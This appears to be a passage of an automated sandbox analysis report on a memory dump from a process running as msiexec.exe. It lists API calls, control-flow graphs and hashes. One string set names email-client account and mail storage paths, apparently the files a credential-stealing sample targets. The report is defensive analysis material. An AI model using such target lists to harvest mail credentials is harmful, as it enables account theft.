                      • Source File: 00000009.00000002.3418617687.0000000023591000.00000040.00001000.00020000.00000000.sdmp, Offset: 23590000, based on PE: true
                      • Associated: 00000009.00000002.3418594137.0000000023590000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.3418617687.00000000235A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_23590000_msiexec.jbxd
                      Similarity
                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                      • String ID:
                      • API String ID: 1324828854-0
                      • Opcode ID: 4e3e8ac620964765279184366a8a6217d1456dfd706500a12185a9ab9cf92746
                      • Instruction ID: a2b59550480e6740d982749858ff8a3592ab746431f3f2eb2c84a57f00bcd71f
                      • Opcode Fuzzy Hash: 4e3e8ac620964765279184366a8a6217d1456dfd706500a12185a9ab9cf92746
                      • Instruction Fuzzy Hash: AB51A271900249AFEB10CFA8D895EDEBBF9EF19300F14455AE559E7281E730E941CBE0

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 333 23593370-235933b5 call 23593330 call 235937a7 338 235933b7-235933c9 333->338 339 23593416-23593419 333->339 340 23593439-23593442 338->340 342 235933cb 338->342 339->340 341 2359341b-23593428 call 23593790 339->341 345 2359342d-23593436 call 23593330 341->345 344 235933d0-235933e7 342->344 346 235933e9-235933f7 call 23593740 344->346 347 235933fd 344->347 345->340 355 235933f9 346->355 356 2359340d-23593414 346->356 350 23593400-23593405 347->350 350->344 351 23593407-23593409 350->351 351->340 354 2359340b 351->354 354->345 357 235933fb 355->357 358 23593443-2359344c 355->358 356->345 357->350 359 2359344e-23593455 358->359 360 23593486-23593496 call 23593774 358->360 359->360 362 23593457-23593466 call 2359bbe0 359->362 365 23593498-235934a7 call 23593790 360->365 366 235934aa-235934c6 call 23593330 call 23593758 360->366 370 23593468-23593480 362->370 371 23593483 362->371 365->366 370->371 371->360
                      APIs
                      • _ValidateLocalCookies.LIBCMT ref: 2359339B
                      • ___except_validate_context_record.LIBVCRUNTIME ref: 235933A3
                      • _ValidateLocalCookies.LIBCMT ref: 23593431
                      • __IsNonwritableInCurrentImage.LIBCMT ref: 2359345C
                      • _ValidateLocalCookies.LIBCMT ref: 235934B1
                      Strings
                      Memory Dump Source
                      • Source File: 00000009.00000002.3418617687.0000000023591000.00000040.00001000.00020000.00000000.sdmp, Offset: 23590000, based on PE: true
                      • Associated: 00000009.00000002.3418594137.0000000023590000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.3418617687.00000000235A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_23590000_msiexec.jbxd
                      Similarity
                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                      • String ID: csm
                      • API String ID: 1170836740-1018135373
                      • Opcode ID: 94650245ea9bacc2e467d62fbc28696edbc0c07757ab84d0d1ae5306e487bf87
                      • Instruction ID: 6efd8adb16c40f1712d3c15f5c9f9e20b9187efaaa94bdc7fbee2ce9f7f7744e
                      • Opcode Fuzzy Hash: 94650245ea9bacc2e467d62fbc28696edbc0c07757ab84d0d1ae5306e487bf87
                      • Instruction Fuzzy Hash: E341C234A00208EBDB10DF68E884A9EBBF5EF45224F1981D5D91D9B251D735EA11CBD0

                      Control-flow Graph

                      APIs
                        • Part of subcall function 23599221: _free.LIBCMT ref: 2359924A
                      • _free.LIBCMT ref: 235992AB
                        • Part of subcall function 2359571E: HeapFree.KERNEL32(00000000,00000000,?,2359924F,?,00000000,?,00000000,?,23599276,?,00000007,?,?,23597E5A,?), ref: 23595734
                        • Part of subcall function 2359571E: GetLastError.KERNEL32(?,?,2359924F,?,00000000,?,00000000,?,23599276,?,00000007,?,?,23597E5A,?,?), ref: 23595746
                      • _free.LIBCMT ref: 235992B6
                      • _free.LIBCMT ref: 235992C1
                      • _free.LIBCMT ref: 23599315
                      • _free.LIBCMT ref: 23599320
                      • _free.LIBCMT ref: 2359932B
                      • _free.LIBCMT ref: 23599336
                      Memory Dump Source
                      • Source File: 00000009.00000002.3418617687.0000000023591000.00000040.00001000.00020000.00000000.sdmp, Offset: 23590000, based on PE: true
                      • Associated: 00000009.00000002.3418594137.0000000023590000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.3418617687.00000000235A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_23590000_msiexec.jbxd
                      Similarity
                      • API ID: _free$ErrorFreeHeapLast
                      • String ID:
                      • API String ID: 776569668-0
                      • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                      • Instruction ID: 3d7cbb234a85af322101713a081ddc8d49aecccaea191c00f16d5fc58f68e091
                      • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                      • Instruction Fuzzy Hash: 11117F31540B08EAEE70ABB0ED45FCBBBBD9F94700F400C64E69E7A052DA24F5544791

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 415 23598821-2359883a 416 2359883c-2359884c call 23599341 415->416 417 23598850-23598855 415->417 416->417 427 2359884e 416->427 418 23598862-23598886 MultiByteToWideChar 417->418 419 23598857-2359885f 417->419 421 23598a19-23598a2c call 23592ada 418->421 422 2359888c-23598898 418->422 419->418 424 2359889a-235988ab 422->424 425 235988ec 422->425 428 235988ca-235988db call 235956d0 424->428 429 235988ad-235988bc call 2359bf20 424->429 431 235988ee-235988f0 425->431 427->417 434 23598a0e 428->434 443 235988e1 428->443 429->434 442 235988c2-235988c8 429->442 431->434 435 235988f6-23598909 MultiByteToWideChar 431->435 437 23598a10-23598a17 call 23598801 434->437 435->434 436 2359890f-2359892a call 23595f19 435->436 436->434 447 23598930-23598937 436->447 437->421 446 235988e7-235988ea 442->446 443->446 446->431 448 23598939-2359893e 447->448 449 23598971-2359897d 447->449 448->437 450 23598944-23598946 448->450 451 235989c9 449->451 452 2359897f-23598990 449->452 450->434 453 2359894c-23598966 call 23595f19 450->453 454 235989cb-235989cd 451->454 455 235989ab-235989bc call 235956d0 452->455 456 23598992-235989a1 call 2359bf20 452->456 453->437 468 2359896c 453->468 459 235989cf-235989e8 call 23595f19 454->459 460 23598a07-23598a0d call 23598801 454->460 455->460 467 235989be 455->467 456->460 471 235989a3-235989a9 456->471 459->460 473 235989ea-235989f1 459->473 460->434 472 235989c4-235989c7 467->472 468->434 471->472 472->454 474 23598a2d-23598a33 473->474 475 235989f3-235989f4 473->475 476 235989f5-23598a05 WideCharToMultiByte 474->476 475->476 476->460 477 23598a35-23598a3c call 23598801 476->477 477->437
                      APIs
                      • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,23596FFD,00000000,?,?,?,23598A72,?,?,00000100), ref: 2359887B
                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,23598A72,?,?,00000100,5EFC4D8B,?,?), ref: 23598901
                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 235989FB
                      • __freea.LIBCMT ref: 23598A08
                        • Part of subcall function 235956D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 23595702
                      • __freea.LIBCMT ref: 23598A11
                      • __freea.LIBCMT ref: 23598A36
                      Memory Dump Source
                      • Source File: 00000009.00000002.3418617687.0000000023591000.00000040.00001000.00020000.00000000.sdmp, Offset: 23590000, based on PE: true
                      • Associated: 00000009.00000002.3418594137.0000000023590000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.3418617687.00000000235A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_23590000_msiexec.jbxd
                      Similarity
                      • API ID: ByteCharMultiWide__freea$AllocateHeap
                      • String ID:
                      • API String ID: 1414292761-0
                      • Opcode ID: 3f87c76d937666a9f5f198081cfa1d24ea3f7f30c4a2870924b715317f278730
                      • Instruction ID: ac8707f076defdda0f4ceb0efc471c339085999b9865e662a38839ecb0721f28
                      • Opcode Fuzzy Hash: 3f87c76d937666a9f5f198081cfa1d24ea3f7f30c4a2870924b715317f278730
                      • Instruction Fuzzy Hash: 9F51E772610216ABFB259F64EC40EAB37B9EB91660F154AE9FD0CD6140EB38DC50C6E4

                      Control-flow Graph

                      APIs
                      • _strlen.LIBCMT ref: 23591607
                      • _strcat.LIBCMT ref: 2359161D
                      • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,2359190E,?,?,00000000,?,00000000), ref: 23591643
                      • lstrcatW.KERNEL32(?,?,?,?,?,?,2359190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 2359165A
                      • lstrlenW.KERNEL32(?,?,?,?,?,2359190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 23591661
                      • lstrcatW.KERNEL32(00001008,?,?,?,?,?,2359190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 23591686
                      Memory Dump Source
                      • Source File: 00000009.00000002.3418617687.0000000023591000.00000040.00001000.00020000.00000000.sdmp, Offset: 23590000, based on PE: true
                      • Associated: 00000009.00000002.3418594137.0000000023590000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.3418617687.00000000235A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_23590000_msiexec.jbxd
                      Similarity
                      • API ID: lstrcatlstrlen$_strcat_strlen
                      • String ID:
                      • API String ID: 1922816806-0
                      • Opcode ID: bcf3f1b22299ed121b803d848c7c7b0b82389acd170842fd0f66b6d7a5bac7e5
                      • Instruction ID: 6b46987149c7f55da03a0c7a833d6737022ddd3c0d0c5ace42858f34a9c729f2
                      • Opcode Fuzzy Hash: bcf3f1b22299ed121b803d848c7c7b0b82389acd170842fd0f66b6d7a5bac7e5
                      • Instruction Fuzzy Hash: 8821B636A00314ABD714DB54EC81EEE77B8EF98710F14405BE50CAB141EB34EA4287E5

                      Control-flow Graph

                      APIs
                      • lstrcatW.KERNEL32(?,?,?,?,?,00000000), ref: 23591038
                      • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 2359104B
                      • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 23591061
                      • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 23591075
                      • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 23591090
                      • lstrlenW.KERNEL32(?,?,?,00000000), ref: 235910B8
                      Memory Dump Source
                      • Source File: 00000009.00000002.3418617687.0000000023591000.00000040.00001000.00020000.00000000.sdmp, Offset: 23590000, based on PE: true
                      • Associated: 00000009.00000002.3418594137.0000000023590000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.3418617687.00000000235A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_23590000_msiexec.jbxd
                      Similarity
                      • API ID: lstrlen$AttributesFilelstrcat
                      • String ID:
                      • API String ID: 3594823470-0
                      • Opcode ID: e701b12f11c46cc8e4c02ea9c6168da982b28ffe27463e63e36a42805168ad22
                      • Instruction ID: 8687bb83830321533915dfe23526b46f3fe59ccdcef38bbd2a3fc2e10a78b5aa
                      • Opcode Fuzzy Hash: e701b12f11c46cc8e4c02ea9c6168da982b28ffe27463e63e36a42805168ad22
                      • Instruction Fuzzy Hash: 1E216D35900328ABDF20AB61EC48EDB3778EB84214F114296E95D971A1EB35DB86CB80

                      Control-flow Graph

                      APIs
                      • GetLastError.KERNEL32(?,?,23593518,235923F1,23591F17), ref: 23593864
                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 23593872
                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 2359388B
                      • SetLastError.KERNEL32(00000000,?,23593518,235923F1,23591F17), ref: 235938DD
                      Memory Dump Source
                      • Source File: 00000009.00000002.3418617687.0000000023591000.00000040.00001000.00020000.00000000.sdmp, Offset: 23590000, based on PE: true
                      • Associated: 00000009.00000002.3418594137.0000000023590000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.3418617687.00000000235A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_23590000_msiexec.jbxd
                      Similarity
                      • API ID: ErrorLastValue___vcrt_
                      • String ID:
                      • API String ID: 3852720340-0
                      • Opcode ID: 305915788d6889bf53ab58224ab4fc34e92549696c4894b1965d482418b4ef50
                      • Instruction ID: ed79f2e27325e08fd2035258d7f9ca47f2be1341cec89568c178beaa9b383369
                      • Opcode Fuzzy Hash: 305915788d6889bf53ab58224ab4fc34e92549696c4894b1965d482418b4ef50
                      • Instruction Fuzzy Hash: 9401F03360A711DDF21036B57C84D0777AAEB6567871002F9E12C970D1FF15D80263C4
                      APIs
                      • GetLastError.KERNEL32(?,?,23596C6C), ref: 23595AFA
                      • _free.LIBCMT ref: 23595B2D
                      • _free.LIBCMT ref: 23595B55
                      • SetLastError.KERNEL32(00000000,?,?,23596C6C), ref: 23595B62
                      • SetLastError.KERNEL32(00000000,?,?,23596C6C), ref: 23595B6E
                      • _abort.LIBCMT ref: 23595B74
                      Memory Dump Source
                      • Source File: 00000009.00000002.3418617687.0000000023591000.00000040.00001000.00020000.00000000.sdmp, Offset: 23590000, based on PE: true
                      • Associated: 00000009.00000002.3418594137.0000000023590000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.3418617687.00000000235A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_23590000_msiexec.jbxd
                      Similarity
                      • API ID: ErrorLast$_free$_abort
                      • String ID:
                      • API String ID: 3160817290-0
                      • Opcode ID: 1166ba4d1e13518b71a53a720d8b2c008007a573c33db5ad0bf7b26d79767d14
                      • Instruction ID: 617d62a851402292994d4c9a586ce10068953b5a52d5cb75c7af9e1e5ae9a5b3
                      • Opcode Fuzzy Hash: 1166ba4d1e13518b71a53a720d8b2c008007a573c33db5ad0bf7b26d79767d14
                      • Instruction Fuzzy Hash: 02F0A432505600AAF25237347C09E0E26BB9BE1971B2A09E5FA1E96181FF25C52751E4
                      APIs
                        • Part of subcall function 23591E89: lstrlenW.KERNEL32(?,?,?,?,?,235910DF,?,?,?,00000000), ref: 23591E9A
                        • Part of subcall function 23591E89: lstrcatW.KERNEL32(?,?,?,235910DF,?,?,?,00000000), ref: 23591EAC
                        • Part of subcall function 23591E89: lstrlenW.KERNEL32(?,?,235910DF,?,?,?,00000000), ref: 23591EB3
                        • Part of subcall function 23591E89: lstrlenW.KERNEL32(?,?,235910DF,?,?,?,00000000), ref: 23591EC8
                        • Part of subcall function 23591E89: lstrcatW.KERNEL32(?,235910DF,?,235910DF,?,?,?,00000000), ref: 23591ED3
                      • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 2359122A
                        • Part of subcall function 2359173A: _strlen.LIBCMT ref: 23591855
                        • Part of subcall function 2359173A: _strlen.LIBCMT ref: 23591869
                      Strings
                      Memory Dump Source
                      • Source File: 00000009.00000002.3418617687.0000000023591000.00000040.00001000.00020000.00000000.sdmp, Offset: 23590000, based on PE: true
                      • Associated: 00000009.00000002.3418594137.0000000023590000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.3418617687.00000000235A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_23590000_msiexec.jbxd
                      Similarity
                      • API ID: lstrlen$_strlenlstrcat$AttributesFile
                      • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                      • API String ID: 4036392271-1520055953
                      • Opcode ID: 413f08df80a72092bd9e34c03d2c8f755b897fb582a9e0b5e5c530529a6b6ced
                      • Instruction ID: 919d8b658be53d4850a9e7788af1138d430e60301c5226ed5a733b8409a977f0
                      • Opcode Fuzzy Hash: 413f08df80a72092bd9e34c03d2c8f755b897fb582a9e0b5e5c530529a6b6ced
                      • Instruction Fuzzy Hash: 8D21A579E103186AEB2097A4FC81FED7339EF90714F001596F608EB1D1EAB15F828799
                      APIs
                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,23594AEA,?,?,23594A8A,?,235A2238,0000000C,23594BBD,00000000,00000000), ref: 23594B59
                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 23594B6C
                      • FreeLibrary.KERNEL32(00000000,?,?,?,23594AEA,?,?,23594A8A,?,235A2238,0000000C,23594BBD,00000000,00000000,00000001,23592082), ref: 23594B8F
                      Strings
                      Memory Dump Source
                      • Source File: 00000009.00000002.3418617687.0000000023591000.00000040.00001000.00020000.00000000.sdmp, Offset: 23590000, based on PE: true
                      • Associated: 00000009.00000002.3418594137.0000000023590000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.3418617687.00000000235A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_23590000_msiexec.jbxd
                      Similarity
                      • API ID: AddressFreeHandleLibraryModuleProc
                      • String ID: CorExitProcess$mscoree.dll
                      • API String ID: 4061214504-1276376045
                      • Opcode ID: 87131b9388ed6d057950e740bc92e9578d1b9542ffa6ced7b1719986fc4a4de0
                      • Instruction ID: 16d35c8ab2830ce6854faad2df2c2e9c65123fde6656942523378575da99db8f
                      • Opcode Fuzzy Hash: 87131b9388ed6d057950e740bc92e9578d1b9542ffa6ced7b1719986fc4a4de0
                      • Instruction Fuzzy Hash: 76F04F71A01208BFEB11AF90DC08F9DBFFAEF54351F0141A5E90DA6250DB39A942DAD4
                      APIs
                      • GetEnvironmentStringsW.KERNEL32 ref: 2359715C
                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 2359717F
                        • Part of subcall function 235956D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 23595702
                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 235971A5
                      • _free.LIBCMT ref: 235971B8
                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 235971C7
                      Memory Dump Source
                      • Source File: 00000009.00000002.3418617687.0000000023591000.00000040.00001000.00020000.00000000.sdmp, Offset: 23590000, based on PE: true
                      • Associated: 00000009.00000002.3418594137.0000000023590000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.3418617687.00000000235A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_23590000_msiexec.jbxd
                      Similarity
                      • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                      • String ID:
                      • API String ID: 336800556-0
                      • Opcode ID: e72d2df2a717c6382be8405e2cd51cf1ee4960d1b310acb74ef4617fd7b56cd5
                      • Instruction ID: d5caec305379fd2599046f27ba7ee0662b9709a2ed6a660f6266aa0050d64478
                      • Opcode Fuzzy Hash: e72d2df2a717c6382be8405e2cd51cf1ee4960d1b310acb74ef4617fd7b56cd5
                      • Instruction Fuzzy Hash: B201AC736012557FB7112BB66C8CD7B6A6DDED29A031A09ABBD0CC7204EF649C0291F4
                      APIs
                      • GetLastError.KERNEL32(00000000,?,00000000,2359636D,23595713,00000000,?,23592249,?,?,23591D66,00000000,?,?,00000000), ref: 23595B7F
                      • _free.LIBCMT ref: 23595BB4
                      • _free.LIBCMT ref: 23595BDB
                      • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 23595BE8
                      • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 23595BF1
                      Memory Dump Source
                      • Source File: 00000009.00000002.3418617687.0000000023591000.00000040.00001000.00020000.00000000.sdmp, Offset: 23590000, based on PE: true
                      • Associated: 00000009.00000002.3418594137.0000000023590000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.3418617687.00000000235A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_23590000_msiexec.jbxd
                      Similarity
                      • API ID: ErrorLast$_free
                      • String ID:
                      • API String ID: 3170660625-0
                      • Opcode ID: d74e0fd4a3d97fd32e72504a10e74256fb159b12c9c404643744fe768dc5cb42
                      • Instruction ID: 010a9bc2248bfe70ac8722a97fd0b0a7857b3e94491303460c17196ea4e6ab58
                      • Opcode Fuzzy Hash: d74e0fd4a3d97fd32e72504a10e74256fb159b12c9c404643744fe768dc5cb42
                      • Instruction Fuzzy Hash: 1D01D172105701ABF21237347C88E0B2ABFDBE15B471A08E5FE1F92142EF28C92351E4
                      APIs
                      • lstrlenW.KERNEL32(?,?,?,?,?,235910DF,?,?,?,00000000), ref: 23591E9A
                      • lstrcatW.KERNEL32(?,?,?,235910DF,?,?,?,00000000), ref: 23591EAC
                      • lstrlenW.KERNEL32(?,?,235910DF,?,?,?,00000000), ref: 23591EB3
                      • lstrlenW.KERNEL32(?,?,235910DF,?,?,?,00000000), ref: 23591EC8
                      • lstrcatW.KERNEL32(?,235910DF,?,235910DF,?,?,?,00000000), ref: 23591ED3
                      Memory Dump Source
                      • Source File: 00000009.00000002.3418617687.0000000023591000.00000040.00001000.00020000.00000000.sdmp, Offset: 23590000, based on PE: true
                      • Associated: 00000009.00000002.3418594137.0000000023590000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.3418617687.00000000235A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_23590000_msiexec.jbxd
                      Similarity
                      • API ID: lstrlen$lstrcat
                      • String ID:
                      • API String ID: 493641738-0
                      • Opcode ID: 2a820aad6cf404b858acdcab175cb7077848d5edfc62e9ac3afa4f997b6d03bb
                      • Instruction ID: 0587ce536f184d2fcb46f6bb9ad11ef9567a703fb6b3263bc8839315aae86497
                      • Opcode Fuzzy Hash: 2a820aad6cf404b858acdcab175cb7077848d5edfc62e9ac3afa4f997b6d03bb
                      • Instruction Fuzzy Hash: EDF089261012147AE7213719EC85E7F7B7CEFD5A60B05001AF60C83190BB55695392F5
                      APIs
                      • _free.LIBCMT ref: 235991D0
                        • Part of subcall function 2359571E: HeapFree.KERNEL32(00000000,00000000,?,2359924F,?,00000000,?,00000000,?,23599276,?,00000007,?,?,23597E5A,?), ref: 23595734
                        • Part of subcall function 2359571E: GetLastError.KERNEL32(?,?,2359924F,?,00000000,?,00000000,?,23599276,?,00000007,?,?,23597E5A,?,?), ref: 23595746
                      • _free.LIBCMT ref: 235991E2
                      • _free.LIBCMT ref: 235991F4
                      • _free.LIBCMT ref: 23599206
                      • _free.LIBCMT ref: 23599218
                      Memory Dump Source
                      • Source File: 00000009.00000002.3418617687.0000000023591000.00000040.00001000.00020000.00000000.sdmp, Offset: 23590000, based on PE: true
                      • Associated: 00000009.00000002.3418594137.0000000023590000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.3418617687.00000000235A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_23590000_msiexec.jbxd
                      Similarity
                      • API ID: _free$ErrorFreeHeapLast
                      • String ID:
                      • API String ID: 776569668-0
                      • Opcode ID: 1a9bc9e1e68a5e63ea881d24724d78273f76926c2ba45f00e68a0aca2d1da02f
                      • Instruction ID: 96d279d3f75299c146a2bc51392661125cea95c6316df8f1562cb12cfd1e285a
                      • Opcode Fuzzy Hash: 1a9bc9e1e68a5e63ea881d24724d78273f76926c2ba45f00e68a0aca2d1da02f
                      • Instruction Fuzzy Hash: 54F04F7151428097E620EB54FAC5C1A7BFAFB602557540C85E90EDB500CB34F9909BD4
                      APIs
                      • _free.LIBCMT ref: 2359536F
                        • Part of subcall function 2359571E: HeapFree.KERNEL32(00000000,00000000,?,2359924F,?,00000000,?,00000000,?,23599276,?,00000007,?,?,23597E5A,?), ref: 23595734
                        • Part of subcall function 2359571E: GetLastError.KERNEL32(?,?,2359924F,?,00000000,?,00000000,?,23599276,?,00000007,?,?,23597E5A,?,?), ref: 23595746
                      • _free.LIBCMT ref: 23595381
                      • _free.LIBCMT ref: 23595394
                      • _free.LIBCMT ref: 235953A5
                      • _free.LIBCMT ref: 235953B6
                      Memory Dump Source
                      • Source File: 00000009.00000002.3418617687.0000000023591000.00000040.00001000.00020000.00000000.sdmp, Offset: 23590000, based on PE: true
                      • Associated: 00000009.00000002.3418594137.0000000023590000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.3418617687.00000000235A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_23590000_msiexec.jbxd
                      Similarity
                      • API ID: _free$ErrorFreeHeapLast
                      • String ID:
                      • API String ID: 776569668-0
                      • Opcode ID: 4a688dbf591dc1b3cd832fd02529b49508b4fc273843f53a5d842c842d6acd74
                      • Instruction ID: 1ddad66f5f986bbc5c1b1a5a79063eeb9004a360a494653288be7672dbeb8bd4
                      • Opcode Fuzzy Hash: 4a688dbf591dc1b3cd832fd02529b49508b4fc273843f53a5d842c842d6acd74
                      • Instruction Fuzzy Hash: 50F0BDB0925214DBD6127F69AA80C087FB6A778658315098AE81D97354D73DCA63ABC0
                      APIs
                      • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\System32\msiexec.exe,00000104), ref: 23594C1D
                      • _free.LIBCMT ref: 23594CE8
                      • _free.LIBCMT ref: 23594CF2
                      Strings
                      Memory Dump Source
                      • Source File: 00000009.00000002.3418617687.0000000023591000.00000040.00001000.00020000.00000000.sdmp, Offset: 23590000, based on PE: true
                      • Associated: 00000009.00000002.3418594137.0000000023590000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.3418617687.00000000235A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_23590000_msiexec.jbxd
                      Similarity
                      • API ID: _free$FileModuleName
                      • String ID: C:\Windows\System32\msiexec.exe
                      • API String ID: 2506810119-1382325751
                      • Opcode ID: 370ede7e21fe7ffc726a83621627180854ee792bef084c8ad3fe10810b142b7e
                      • Instruction ID: 0c4883800622d5ab136d4108d2d11ef77137e5dd4bc8501a1daa216af3deba69
                      • Opcode Fuzzy Hash: 370ede7e21fe7ffc726a83621627180854ee792bef084c8ad3fe10810b142b7e
                      • Instruction Fuzzy Hash: D73160B1B00358AFEB21DF99A980D9EBBFDEB99314B1540D6E90897200D775CE41DBD0
                      APIs
                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,23596FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 23598731
                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 235987BA
                      • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 235987CC
                      • __freea.LIBCMT ref: 235987D5
                        • Part of subcall function 235956D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 23595702
                      Memory Dump Source
                      • Source File: 00000009.00000002.3418617687.0000000023591000.00000040.00001000.00020000.00000000.sdmp, Offset: 23590000, based on PE: true
                      • Associated: 00000009.00000002.3418594137.0000000023590000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.3418617687.00000000235A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_23590000_msiexec.jbxd
                      Similarity
                      • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                      • String ID:
                      • API String ID: 2652629310-0
                      • Opcode ID: 368f97015d3885c765f4c800809db7d6b30286ef54be4aeb008afa7c5b5eb025
                      • Instruction ID: b8ac575fd3aa9f5b4654797a576744a4694e4b4fa3aaf2d6c51154603b1689b3
                      • Opcode Fuzzy Hash: 368f97015d3885c765f4c800809db7d6b30286ef54be4aeb008afa7c5b5eb025
                      • Instruction Fuzzy Hash: C231C132A0022AABEF249F64EC80DAF7BB5EB50310F0501A8ED08D7150E73AD951CBD0
                      APIs
                      • GetModuleHandleA.KERNEL32(2359C7DD), ref: 2359C7E6
                      • GetModuleHandleA.KERNEL32(?,2359C7DD), ref: 2359C838
                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 2359C860
                        • Part of subcall function 2359C803: GetProcAddress.KERNEL32(00000000,2359C7F4), ref: 2359C804
                      Memory Dump Source
                      • Source File: 00000009.00000002.3418617687.0000000023591000.00000040.00001000.00020000.00000000.sdmp, Offset: 23590000, based on PE: true
                      • Associated: 00000009.00000002.3418594137.0000000023590000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.3418617687.00000000235A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_23590000_msiexec.jbxd
                      Similarity
                      • API ID: AddressHandleModuleProc
                      • String ID:
                      • API String ID: 1646373207-0
